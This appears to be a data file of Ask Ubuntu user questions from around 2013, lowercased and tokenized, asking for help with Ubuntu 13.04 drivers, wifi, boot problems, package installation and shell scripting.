290980	nvidia optimus work with ubuntu 13.4	and nvidia optimus work with ubuntu 13.4 and i try to install the driver by go to recovery mode and got to root then i command ( sudo sh path/nvidia ... .run ) show this error < unable to creat temprorary files in /tmp > whats wrong ?
290988	command line prompt looks strange in virtual console	in a terminal emulator like xterm my prompt looks like this : [ august @ macmini ~ ] $ but in a virtual console the string ; linux is prepended to the prompt to make it look like this : ; linux [ august @ macmini ~ ] $ does anyone know where the `` linux '' string may come from ?
290989	where i did paste the confirmation code	i am from bulgaria . i need to help mi in which application i did paste the confirmation code from my email to validate the email address and log in ubuntu one ? copy and paste the confirmation code below into the desktop application thank you !
290990	flatten directory with incrementing names	i need a bash script for flattern a directory with same names , and get an ordered output after a conversion . input folder structure : /in1/file1.wav /in1/file2.wav /in1/file3.wav /in2/file1.wav /in2/file2.wav /in2/file3.wav /in2/file4.wav /in3/file1.wav /in3/file2.wav and i need an output directory like this : /out/file0001.mp3 /out/file0002.mp3 /out/file0003.mp3 /out/file0004.mp3 /out/file0005.mp3 /out/file0006.mp3 /out/file0007.mp3 /out/file0008.mp3 /out/file0009.mp3 where /out/file004.mp3 is the mp3 conversion of /in2/file1.wav i 've done some trials with find -exec but i mess up something.. some hints ? ( do n't worry about conversion , i just use ffmpeg -i fileinput fileoutput.mp3 )
290993	wireless working on ubuntu 13.04 installer but fails when installed	i have a lenovo y480 with a broadcom bcm4313 card . the ethernet and wireless connection works using the ubuntu 13.04 installer , however once installed both wireless and ethernet fails . when i checked software & updates > additional drivers it detects that my device is not working . is there a way that i can use the drivers from the installer ? why is n't it working when installed ?
290997	ubuntu 13.04 detects only 2 out of 4 cores	i have just installed and updated ubuntu desktop 13.04 64-bit ( 3.8.0-19-generic ) . i have amd phenom ( tm ) ii x4 945 processor with 4 cores , but the cpuinfo shows only 2 cores avaible . how can i enable the remaining 2 cores ( so the flash wo n't freez hopefully ) ?
290998	how to integrate keypass2 and chrome/chromium using chromipass in ubuntu 13.04 & 13.10	i have already installed keepass2 and also installed add-on chromeipass . but i do n't know how to integrate it . pls help me with the instructions . it 's showing error : chromeipass has encountered an error : is keepasshttp installed and is keepass running ?
291001	how to install opera browser ?	i am trying to install opera browser from the terminal . i downloaded the 'debian ' installer because it did n't show up in software center . it completely destroyed my software center - it is frozen and i have no idea how to fix ( i have a different thread for that though ) . can i use this thing called synaptic package manager to install opera ? or am i stuck with firefox ? how do i install opera browser ?
291002	how to integrate keypass2 and firefox using keefox/passifox in ubuntu 13.04 & 13.10	i have already installed keepass2 and also installed both add-ons keefox , passifox . but i do n't know how to integrate it . pls help me with the instructions .
291009	host-only network with virtual box and windows host machine : can not find device eth1	( answer below ) i have problem with implementing host-only network in virtualbox . my host machine is running under windows 7 ultimate , and guest os is ubuntu server 12.04.2 64bit . i configure virtual box host-only adapter . as you can see dhcp server is disabled and i try both enabled and disabled but problem still there . below is result of ipconfig /all from windows cmd now my virtual machine network settings when i run vm the ubuntu force some problem with network configuration as image below my /etc/network/interfaces file as below : when i restart networking service , show `` can not find device eth1 , failed to bring up eth1 as below : if i go with `` ifdown '' options , response as bleow : any help will be appreciated thanks in advance answer virtualbox network adapter name on guest machine is not fixed all the time , each time you have disable and enable host adapter from vb prefrences , the network device name post-appended number will increase . for example , if you disable and enable network host-only adapter five times , the new network name should be eth4 , and if it was eight times , network name will should be eth7 and so on . if you do n't know what is your current network device name , use : ifconfig -a it will print all available network adapters ( devices ) , find your new name and reconfigure /etc/network/interfaces file with new name . for dhcp configuration use code below with changing eth5 with your current device name auto eth5 iface eth5 inet dhcp and for static ip you can code below : ( you still need to change eth5 with your device name , and also the static ip , no need to change netmask in most situations ) : auto eth5 iface eth5 inet static address 192.168.56.101 netmask 255.255.255.0 i hope this will help somebody else .
291010	bash script using a firefox profile to open urls	working on a script to automate some tasks in firefox . these tasks should run through a clean firefox profile , so they are fast and do n't interfere with any of my regular surfing . # ! /bin/bash # launch clean firefox profile with parameters : # -no-remote do n't connect to any running instance of firefox # -p run firefox through a profile firefox -p 'another profile ' & sleep 4 # wait for firefox to load # open urls firefox -new-tab 'http : //askubuntu.com/users' firefox -new-tab 'http : //askubuntu.com/badges' unfortunately , i ca n't get the urls to open in the profile `` another profile '' . instead , ubuntu launches firefox with my default user profile and opens them , there . any suggestions on how to open them in `` another profile '' ?
291015	i ca n't run gtg ( getting things todo by gnome ) properly	i 've installed gtg by adding ppa to repository . when i run gtg from terminal some features go idle . how can i active these features ? 2013-05-05 17:27:15,934 - warning - __init__ : __init__:77 - backend backend_twitter could not be loaded : no module named tweepy.models 2013-05-05 17:27:15,937 - warning - __init__ : __init__:77 - backend backend_rtm could not be loaded : no module named dateutil.tz 2013-05-05 17:27:15,991 - warning - __init__ : __init__:77 - backend backend_evolution could not be loaded : no module named evolution 2013-05-05 17:27:15,991 - warning - __init__ : __init__:77 - backend backend_mantis could not be loaded : no module named suds.client 2013-05-05 17:27:15,992 - warning - __init__ : __init__:77 - backend backend_launchpad could not be loaded : no module named launchpadlib.launchpad
291016	how do i open screen with many tabs to execute some commands within each one	how to open screen with many tabs ? how can i execute some commands within each tab , plus giving the main screen window a name to call it again later to execute other commands ? for example , i have a loop this is the code inside it : gnometab+= ( -- tab -e `` cpulimit -p $ i -l $ limitationpercentage `` ) and i run the result after finishing the loop in gnome terminal like this : gnome-terminal `` $ { gnometab [ @ ] } '' i want to do exactly as happens in the gnome terminal to open many tabs within the main terminal window and execute this command . but , i want to re-do this by gnuscreen . in addition , i want to give the main screen window a name : for example : let it be `` screen1 ''
291019	need to rescue ubuntu without mess	i usually play with os and always use dual boot ( win , ubuntu ) . so the grub problem is more obvious , at my first usage of ubuntu i found it very difficult to restore grub . live cd method always frustrated . luckily i found an image of ubuntu grub rescue ( automagic grub or something i forgot its name ) that was very helpful , it simply detects ubuntu and i can re-enter if some grub prob occurs . and the tough time for me now is i lost that cd . i ca n't even find exactly that image there are many like that but i found difficult to do it . i installed windows after installing ubuntu . so grub is gone and i want it back . please suggest me a neat way to do it . ( it would be better if anyone found the same cd i used ) .
291020	trapped in the `` configuring ttf-mscorefonts-installer ''	i finally installed wine ( the program to run exe files ) and it took a very long time to install . now , i have a package configuration window that is pink and looks like this . i do n't know what to do at this point and i can not exit out of that window without the whole installation failing and then messing up my sudo apt-get install commands . i tried hitting esc and enter but nothing works . i 've clicked all around the screen too and still , nothing works . please help !
291023	how to fix black screen after update to 13.04 in a hp 530 ?	after updating to ubuntu 13.04 ( from 12.04 ) i 've got a blackscreen at boot . the machine is running fine as i hear the startup sound to enter my password , i just do n't see anything . i started using grub mode and nomodeset , everything is working then but the machine is extremely slow ( not usable ) . sounds like there is a problem with the integrated intel graphics driver in ubuntu 13.04 ( 64-bit ) . does anyone have a solution to my problem ?
291024	unable to remove directory connected to netflix	just got a quick question . i am trying to get netflix to run on ubuntu since the silverlight incident in april . i have of course attempted the solution of removing the directory with : rm -rf ~/.wine-browser however when i attempt to do this i receive the error message that what i 'm trying to delete ca n't be found . i would really appreciate any advice to get this up and running . would maybe uninstalling and reinstalling netflix work ?
291027	ubuntu equivalent of system restore ? does it exist ?	ubuntu n00b here . i have created several disasters of the first order already . i am getting ready to try to install opera - it is a very long and arduous process . i am afraid - no - i am absolutely certain that i will damage something important . how do i create a system restore point ? does such a thing exist ?
291029	wifi usb dongle detected but no wlan interface	i 'm using ubuntu 12.04 . when i insert my philips pta01 usb wifi dongle , in dmesg i can see : [ 1181.535290 ] usb 2-3 : new high-speed usb device number 4 using ehci_hcd [ 1181.684074 ] usb 2-3 : new usb device found , idvendor=0471 , idproduct=209e [ 1181.684086 ] usb 2-3 : new usb device strings : mfr=16 , product=32 , serialnumber=48 [ 1181.684093 ] usb 2-3 : product : pta-01 [ 1181.684100 ] usb 2-3 : manufacturer : philips tv [ 1181.684105 ] usb 2-3 : serialnumber : 10 dmesg | grep ath : [ 367.861626 ] usbcore : registered new interface driver ath9k_htc but still there is no wlan interface when i do ifconfig . just eth0 and lo . how can i turn wifi on ? in case it 's relevant . uname -a : linux myhost 3.5.0-28-generic # 48~precise1-ubuntu smp wed apr 24 21:42:24 utc 2013 x86_64 x86_64 x86_64 gnu/linux
291034	adding repository	the official documentation page to install opera says to add this : deb http : //deb.opera.com/opera/ stable non-free somehow this : http : //deb.opera.com/opera/ ended up in the url field of the edit source dialog box . it ended up there from a previous unsuccessful attempt ( epic fail - i destroyed updater , software center , and synaptic ) . the words stable and non-free are in other fields : stable is in 'distribution ' , i will change that to raring so that it looks like the official ubuntu documentation page . non-free is in 'components ' . so what should be in the url field ? i will change distro to raring . is non-free ok to be in component ? 4theye - i will try - i do n't know how : hope that woked .
291035	how to add a gpg key to the apt sources keyring ?	ubuntu doc page says this : it is advisable that you add the opera gpg key . wget -qo - http : //deb.opera.com/archive.key | sudo apt-key add - where do i add that ? i want to take the advice but i do n't know what part of software center to add gpg keys to .
291039	is there any file manager that highlights names that are searched for ?	when in chrome or other new web browsers , a word is searched in a page , all occurrences of the word is highlighted . i need a similar functionality for a file manager . i tested nautilus and dolphin . i searched a word in a folder with a lot of files . but instead of highlighting the files with names containing that word ; files with names not containing that word were hidden . is there any file manager for ubuntu or option that highlights names that are searched for ( instead of hiding other files ) ?
291040	wifi is enabled on 13.04 but can not connect . on dell inspiron . recommended solution does not work	i recently upgraded to ubuntu 13.04 from ubuntu 12.10 . however , since then although my wireless network is detected , i can not connect to it . ubuntu keeps on trying to reconnect with the network but is not successful . same machine on windows 8 i am able to connect to the same wireless network . also , ethernet is working fine as i am able to connect to the same network through ethernet on ubuntu . my lspci -nn output is 12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) 13:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) i already tried the solution in this post broadcom corp. bcm4313 wirelss not detected in ubuntu 12.10 but it not solving my problem . the situation is the same . please help me . i do not want to switch to using windows again .
291042	how to make a recovery partition on a ubuntu laptop ?	i have been wondering , how to make a recovery partition , such as system76 does with its ubuntu laptops : there isn’t an included recovery disc you can run off of in case your system gets messed up . instead , there’s a recovery partition you can boot into to start a full recovery . source how do they make those ? is it simply a copy of system when first installed ? how can i make a recovery partition fo my own ?
291043	ca n't connect to maas due to `` files does not exist : /var/www/maas '' error	i have attempted to install maas on ubuntu 12.04 lts and 13.04 , but on both i can not connect to the region controller via a web browser for the post installation per the http : //maas.ubuntu.com/docs/install.html guide . i can connect to the default apache webpage without issue . reviewing the apache error log , on both instances i see the following error : [ sat may 04 20:48:53 2013 ] [ error ] [ client 172.16.86.1 ] files does not exist : /var/www/maas i used the troubleshooting guide ( http : //maas.ubuntu.com/docs/troubleshooting.html ) but everything checked out . is there an issue with the maas package / installation option ?
291045	best graphics card brand/ drivers for gaming on ubuntu ?	i 'm making up plans for when i eventually want to build my own gaming desktop with ubuntu installed and use the steam client linux version . the only thing i 'm having problems with is what are the best type of graphics cards/drivers for ubuntu ? other words , which company has the best support for developing the graphics cards/drivers that are used on ubuntu ? should i choose amd , intel , or nvidia for my graphics card ?
291049	some sites not opening in firefox	i am unable to open yahoo hdfc and some other sites with mozilla , chromium i tried : changing dns enabling java reinstalling firefox
291050	multi-choice memory stick ?	now , with large memory sticks being cheap , i think it would be nice to have many or all official flavours available on one memory stick . that is ; you boot from a memory stick and get a menu which lets you choose between the most current version , the latest lts , 32- and -64 bit , kubuntu , xubuntu , lubuntu , etc . this would make for a very nice way to demonstrate different flavours and also choose 32- or 64-bit as appropriate . what would be the best way to accomplish this ?
291051	is there a safe way to use an old kernel in ubuntu 13.04 ?	i am using ubuntu 13.04 . everything works well , external for vga_switcheroo switchable graphics . doing some research i have found that the problem is the way the kernel handles lcd backlight . the problem is not present in pre 3.7 kernels . i tried installing a 3.6-based kernel from mainline in my ubuntu 13.04 setup . initially it worked ok , but there were some issues with lightdm ( it would take several `` automatic '' attempts to get to the login screen ) . and later my installation went corrupt ( i only got a black screen after login , no matter what kernel i used ) . i had to reinstall . is there a safe way of using an old kernel ( precise or quantal kernel , for example ) in ubuntu 13.04 ?
291054	ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock '	i just installed appache , mysql and php , suring my installation , i was prompted for a mysql root user password , but when i start my mysql , it pops the error , and i just ca n't seem to find a way around it , most solutions i 've read does n't solve it , moreover , i found out that the /var/run/mysqld path does n't even exist , my php also needs the socket to connect to my database .
291055	how can i set a persistent bash variable ?	i use the following procedure to set up a shortcut for accessing directory $ pwd $ user/home/somefolder/somefolder1 $ export shortcut= $ pwd now if i am in my home directory and type $ pwd $ user/home $ cd $ shortcut $ pwd $ user/home/somefolder/somefolder1 but this method works only for one session and if i restart the terminal the above set shortcut does not seem to work . is this the way it 's supposed to happen or am i doing something wrong ? also if it works this way , is there a way to permanently set this shortcut ?
291063	how to disable update notification for all users ?	this is a partial case of the more general question `` do n't bother non-admin users with admin questions '' : i have several non-admin users on a computer and i want to disable software updates for all of them . i tried this : # su wife -c gconftool -s -- type bool /apps/update-notifier/auto_launch false x11 connection rejected because of wrong authentication . x11 connection rejected because of wrong authentication . x11 connection rejected because of wrong authentication . x11 connection rejected because of wrong authentication . ( i am logged on to the computer being administered via ssh ) .
291066	which applications and programs are vital at startup ?	the following applications from below are in my list of startup . which one of them are strict necessary for the system ? how can i remove those not necessary from startup ( but not from my laptop ) ? at-spi d-bus bus backup monitor bluetooth manager certificate and key storage gnome keyring : pkcs # 11 component chat telepathy indicator service check for new hardware drivers notify about new hardware drivers ... desktop sharing gnome desktop sharing server disk notifications provides notifications related to disks files gnome settings daemon gpg password agent gnome keyring : gpg agent gsettings data conversion migrates user settings from gconf to dconf gwibber update your microblog and view others ' statuses mount helper network onboard orca screen reader personal file sharing policykit authentication agent pulseaudio sound system screensaver secret storage service ssh key agent ubuntu one update notifier user folders update zeitgeist ddatahub thanks , j .
291068	missing documentation for qt5 on ubuntu 13.04	i use qt creator for building applications and recently i decided to upgrade my ubuntu from 12.10 to 13.04 and upgrade my current project from qt4 to qt5 . the problem is that the help section provides no documentation for qt5 . for qt4 i used to have the package qt4-doc , but there 's no qt5-doc or anything similar . how to install the qt5 documentation ?
291075	how to make an ubuntu sdk dialog not stretch over the full mainview ?	when i create a dialog with the ubuntu sdk , like in the example below , the dialog covers the full mainview : import qtquick 2.0 import ubuntu.components 0.1 import ubuntu.components.popups 0.1 mainview { id : root applicationname : `` pd '' width : units.gu ( 54 ) height : units.gu ( 96 ) button { id : mb text : `` party down '' width : parent.width * 0.8 anchors.centerin : parent onclicked : popuputils.open ( qt.createcomponent ( `` fundialog.qml '' ) , mb ) } } fundialog.qml : import qtquick 2.0 import ubuntu.components 0.1 import ubuntu.components.popups 0.1 dialog { id : fundialog title : `` are we having fun yet ? '' width : units.gu ( 10 ) height : units.gu ( 10 ) button { text : `` cancel '' onclicked : popuputils.close ( fundialog ) } } i would like it to look as in the ubuntu sdk gallery : however , i ca n't figure out where in the gallery code this behavior is fixed .
291076	updating ubuntu to the latest	i 've been using ubuntu for quite some time now and i absolutely love it . i recently purchased a laptop ( dell inspiron 15r 5521 ) which is supported by ubuntu ( i checked in the certified hardware list ) . it comes with windows 8 pre installed . i followed a guide here that shows how to dual boot ubuntu and windows 8 with doing something in bios and boot repair and stuff . it worked well and i successfully dual booted them . now my question is . i have no clue about the uefi thing . if i want to update ubuntu to 13.04 , will it mess up the laptop ? i 'm asking cause installing it was a lenghty procedure . will updating have any special needs or steps to be followed or is it just a normal update ? thanks .
291080	problem with installing ubuntu 13.04 alongside with windows 8	i have tried the written tip but it does n't work so any idea how to solve this ? by the way this happened with my only with windows 8 . this is ubuntu installation from usb flash memory , screenshot :
291082	why is n't the screenshot working ?	when taking a screenshot , there is a gray image displayed . before upgrading to ubuntu 13.04 the screenshot was working properly , however , after the upgrading process the screenshot wont work no more . i tried to verify which package was the problem from : gnome-screenshot , i unistalled it and installed back on my laptop , but it wont work anyways .
291086	find files with same name in different folders	this is a tricky one . i need to do the following using 2 folders , the movie folder and the subtitle folder : search for every movie inside the movie folder , for each file it finds , grab the files name and try to search for it in the subtitle folder . if the file is found do nothing . if the file is not found , output the file name to a log file that will collect all movies that do not have a subtitle . the movie folder has the following format : /movies /movies/somemoviefolder1 /movies/somemoviefolder2 /movies/somemoviefolder3 /movies/somemoviefolder ... /movies/somemoviefoldern and inside each moviefolder is the actual movie ( each movie is in it 's own folder inside the movie folder . the subtitle folder has all subtitles in the same place . in the subtitles folder . my thinking would be 2 find commands looped together using a while . this would be a shell script ( bash ) . movies are mp4 or mkv formats . subtitles are srt format .
291094	`` no network devices available '' after fresh install of 13.04	upgraded to 13.04 over the weekend with fresh install of the official 13.04 distro . afterwards the networking icon shows : no network devices available installed onto a dell xps m1210 . no network connectivity for ethernet or wifi . yellow lights are are on when ethernet cable is inserted . any help is appreciated . the broadcom controller does show up in the output : sudo lshw -c network *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:17 memory : efdfc000-efdfffff *-network unclaimed description : ethernet controller product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 resources : memory : ef9fe000-ef9fffff lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub [ 8086:27a0 ] ( rev 03 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller [ 8086:27a2 ] ( rev 03 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller [ 8086:27a6 ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation nm10/ich7 family high definition audio controller [ 8086:27d8 ] ( rev 01 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation nm10/ich7 family pci express port 1 [ 8086:27d0 ] ( rev 01 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation nm10/ich7 family pci express port 2 [ 8086:27d2 ] ( rev 01 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation nm10/ich7 family pci express port 4 [ 8086:27d6 ] ( rev 01 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation nm10/ich7 family usb uhci controller # 1 [ 8086:27c8 ] ( rev 01 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation nm10/ich7 family usb uhci controller # 2 [ 8086:27c9 ] ( rev 01 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation nm10/ich7 family usb uhci controller # 3 [ 8086:27ca ] ( rev 01 ) 00:1d.3 usb controller [ 0c03 ] : intel corporation nm10/ich7 family usb uhci controller # 4 [ 8086:27cb ] ( rev 01 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation nm10/ich7 family usb2 ehci controller [ 8086:27cc ] ( rev 01 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev e1 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801gbm ( ich7-m ) lpc interface bridge [ 8086:27b9 ] ( rev 01 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] [ 8086:27c4 ] ( rev 01 ) 00:1f.3 smbus [ 0c05 ] : intel corporation nm10/ich7 family smbus controller [ 8086:27da ] ( rev 01 ) 03:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) [ 0c00 ] : ricoh co ltd r5c832 ieee 1394 controller [ 1180:0832 ] 03:01.1 sd host controller [ 0805 ] : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter [ 1180:0822 ] ( rev 19 ) 03:01.2 system peripheral [ 0880 ] : ricoh co ltd r5c592 memory stick bus host adapter [ 1180:0592 ] ( rev 0a ) 03:01.3 system peripheral [ 0880 ] : ricoh co ltd xd-picture card controller [ 1180:0852 ] ( rev 05 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 )
291097	usb boot does n't work	i have installed ubuntu on a usb stick and tried to boot it on my pc , but when i did this all that happend was a flickering appearing , going on and on and on . nothing happens . what can i do about this ? p.s . : to be fair if got very less experience with this .
291103	quickly ca n't package , but raises no errors	i am trying to make a .deb package for my project in quickly . this is what i get : ilya @ ilya-laptop : ~/projects/online-translator $ quickly package ... ... ... ..ubuntu packaging created in debian/ ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command returned some errors : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- error : xgettext failed to generate po template file . please consult error message above if there is any . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- произошла ошибка во время сборки пакета . ошибка : не удалось выполнить команду package прервано the last lines in russian do not mean anything , except for telling , that there was an error , while packaging . please consult error message above if there is any . and what to do , if there is no messages ? .. edit : ok , i found , that you can run quickly package with -- verbose option , so this is the error part : intltool-update -p -g online-translator xgettext : ошибка открытия файла `` ./../yandex_translate/__init__.py '' для чтения : нет такого файла или каталога # # # it says , it ca n't use file `` ./../yandex_translate/__init__.py '' , because there is no such file error : xgettext failed to generate po template file . please consult error message above if there is any . error : command 'intltool-update ' failed with exit status 1 dh_auto_build : python setup.py build -- force returned exit code 1 make : *** [ build ] ошибка 1 dpkg-buildpackage : ошибка : debian/rules build возвратил код ошибки 2 произошла ошибка во время сборки пакета . ошибка : не удалось выполнить команду package прервано i use yandex_translate module in my app , but why should xgettext use it 's files ? where can there be a reference to that file ? there is truly no such file there , because i have already removed the module directory from my project folder , but it was there before .
291108	make another partition bootable	so i have my / on an ssd that decided to have a bad sector . i do n't know if there a way to copy the data on another partition on an hd that i already have but do n't use yet and make it bootable ? or ... even with a bad sector ( that what seams to be the problem when i want to log in tty ) , an upgrade of ubuntu might help going over this bad sector ? i just do n't want to lose my /home , so tired of restoring it with that awful back-up system . any ideas or suggestions are very welcomed here !
291109	connection timeout after 60 seconds	i have installed dnscrypt on ubuntu linux 10.04.1 x86_64 and it worked nslookup facebook.com 127.0.0.2 server : 127.0.0.2 address : 127.0.0.2 # 53 non-authoritative answer : name : facebook.com address : 173.252.110.27 but after about 60 seconds nslookup facebook.com 127.0.0.2 ; ; connection timed out ; no servers could be reached the deamon is already running . it 's like something by os prevents /usr/local/sbin/dnscrypt-proxy to accept connections . what can do this ? edit 1 : the problem only appears on udp . query udp port dig @ 127.0.0.2 +notcp facebook.com ; < < > > dig 9.7.0-p1 < < > > @ 127.0.0.2 +notcp facebook.com ; ( 1 server found ) ; ; global options : +cmd ; ; connection timed out ; no servers could be reached query tcp port dig @ 127.0.0.2 +tcp facebook.com ; < < > > dig 9.7.0-p1 < < > > @ 127.0.0.2 +tcp facebook.com ; ( 1 server found ) ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 63984 ; ; flags : qr rd ra ; query : 1 , answer : 1 , authority : 0 , additional : 0 ; ; question section : ; facebook.com . in a ; ; answer section : facebook.com . 889 in a 173.252.110.27 ; ; query time : 516 msec ; ; server : 127.0.0.2 # 53 ( 127.0.0.2 ) ; ; when : sun may 5 22:34:14 2013 ; ; msg size rcvd : 46
291113	ubuntu 13.04 `` could not find required opengl entry point 'glgeterror ' ! ''	just recently upgraded to 13.04 and am having trouble running tf2 via steam . whenever i start steam i get a dialog saying : opengl glx context is not using direct rendering , which may cause performance problems . every time i go to launch tf2 i get a dialog saying : could not find required opengl entry pint 'glgeterror ' ! either your video card is unsupported , or your opengl driver needs to be updated . i tried updating my nvidia drivers , hoping that would solve this issue but alas , it did not . i believe this issue is related to a fix i used to get skype working with 13.04 , specifically this . just a heads up i 'm using gnome shell 3.8 . let me know if you need anymore information about my system .
291127	ubuntu 13.04 raop to airport express 2nd generation does n't work , how do i debug and get it working ?	i have never had any luck with raop or stream2ip from ubuntu 12.04 or 13.04 to my airport express 2nd generation . in pulseaudio the airplay device either discovered by raop in paprefs or connected to by stream2ip appears and is selectable . however , when i start to play audio from vlc or rhythmbox the players just sit there . the play button is `` pressed '' and the pause icon appears but the track does n't start playing it just 'sits there ' . no audio at all . if i change the output back to local speakers then the track starts playing . it 's frustrating to say the least , no one else seems to report this issue . how can i debug what is going awry ?
291130	nautilus quicklist not working	after having an issue with the new version of gnome 's nautilus breaking the wallpaper , i uninstalled and went back to the version included in ubuntu 13.04 . after a successful reinstallation , the quicklist functionality in the launcher is no longer present . along with the quicklists not working , neither are services such as gnome 's sushi . i 've looked at other similar threads that offered no solution . does anybody know how to fix this ?
291131	how to set up d-link dwa-111 usb wlan adapter ?	i today got stuck while trying to install/set up my usb-wlan adapter . it 's a dwa-111 usb-stick ( rev . a1 ) and my machine is currently running ubuntu 12.04 lts . ( as far as i know it 's got a rt73 chipset by ralink , but i am not completely sure . ) so much for this . the adapter runs perfectly using a machine with win7 installed but it does absolutely nothing when i plug it at my ubuntu 12.04 machine . iwconfig and ifconfig show nothing , as well as the device is not listed when executing lsusb . so it seems it 's entirely unknown to my computer . here 's some output of lsusb , now showing the d-link device ( as already described below in comments i just noticed the device is appearing and disappearing every now and then ) : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 07cc:0301 carry computer eng. , co. , ltd 6-in-1 card reader bus 002 device 009 : id 046d : c223 logitech , inc . keyboard / usb hub bus 002 device 003 : id 1e7d:2ced logitech mouse bus 002 device 010 : id 046d : c226 logitech , inc . keyboard bus 002 device 011 : id 046d : c227 logitech , inc . keyboard bus 001 device 039 : id 07d1:3c06 d-link system information on an error in /var/log/syslog may 5 18:34:39 computer kernel : [ 7738.978659 ] phy1 - > rt73usb_init_eeprom : error - invalid rt chipset detected . may 5 18:34:39 computer kernel : [ 7738.978662 ] phy1 - > rt2x00lib_probe_dev : error - failed to allocate device . may 5 18:34:39 computer kernel : [ 7738.978763 ] usb 1-9 : usb disconnect , device number 12 may 5 18:34:39 computer mtp-probe : bus : 1 , device : 12 was not an mtp device may 5 18:34:39 computer kernel : [ 7739.092048 ] usb 1-9 : new high-speed usb device number 13 using ehci_hcd may 5 18:34:40 computer kernel : [ 7739.258536 ] usb 1-9 : too many configurations : 60 , using maximum allowed : 8 may 5 18:34:40 computer mtp-probe : checking bus 1 , device 13 : `` /sys/devices/pci0000:00/0000:00:13.5/usb1/1-9 '' may 5 18:34:40 computer kernel : [ 7739.796047 ] usb 1-9 : reset high-speed usb device number 13 using ehci_hcd may 5 18:34:40 computer kernel : [ 7739.962505 ] usb 1-9 : device firmware changed may 5 18:34:40 computer kernel : [ 7739.962547 ] phy2 - > rt2x00usb_vendor_request : error - vendor request 0x09 failed for offset 0x0000 with error -19 . this error messages just keep repeating over and over . any ideas how do i get the device installed and running ? and additionally any idea about the lsusb behaviour ? thank you !
291135	how to stop screen going black after 10 min	my os is lubuntu 13.04 . after 10 mins of inactivity the screen goes black . what i did to stop it without effect : uninstalled xscreensaver completely in power setting i set to never blank the screen run some command found in the internet with `` xset '' which was said to solve it ( but maybe it was wrong command , if you know proper please write it ) and still nothing . i do n't know why lubuntu wants so hard to keep going black when watching films . for example on kubuntu/ubuntu i just set in power settings to never go black and it works . maybe lubuntu uses customized kernel with hard-coded extreme energy savings that ca n't be turned off ?
291137	can not connect to wifi network in ubuntu 13.04	i recently upgraded to ubuntu 13.04 from the version before ( 12. something or other ) , and i found that since upgrading , i have not been able to connect to the wifi network that i always connect to ( my home network ) . it has the correct passcode , so that is not the problem , but it just can not connect . i have an hp pavilion g6 laptop . if you need any more information to help this problem , i would greatly appreciate it . thank you !
291139	ubuntu 13.04 hdmi broken	i recently upgraded from 12.10 to 13.04 and ever since the upgrade the audio from my hdmi has not been working . it does n't show up in the sound options as it did in 12.10 and it does n't show up when running lspci . futhermore , the hdmi has a hard time being recognized at all ; meaning that it does n't always add a video connection and instead does n't react at all . i have n't seen anyone else with the video problem . but i tried installing oem-audio-hda-daily-dkms_0.201305051134~raring1_all.deb from alsa daily build snapshots as suggested here : no sound via hdmi to try and fix the audio but with no luck . i 'm using a lenovo b570 , with an intel i5 2410m , intel hd 3000 . do you have any suggestions ?
291140	drumburp ( drum tab editor ) not working ubuntustudio 12.04	i install drumburp v0.9 for x86 ubuntu from whatang.org drumburp which is a drum tab editor free , but does not work on my 12.04 ubuntustudio , however works fine in windows 7 on other machines . i tried running it on ubuntu 10.04 lts which has python 2.6 inside virtualbox and it works fine ( sound with timidity ) : drumburp 0.9 working on ubuntu 10.04 lts i also tried running it on peppermint ( ubuntu based distro ) which also has python 2.6 but did not work . then i started on my laptop ubuntu 12.04 live cd ( no install ) and run it but it did not work , said there was no sound card . i do not understand why not working on ubuntustudio 12.04 , and i have not installed on this laptop ubuntu 12.04 , but here i leave a picture of the terminal : drumburp does n't working on ubuntustudio 12.04
291143	touchpad does not exist	i have installed ubuntu 13.04 and i have opened mouse & touch-pad , but there is no touch pad tap . i am using a dell inspiron 17r 7720 se .
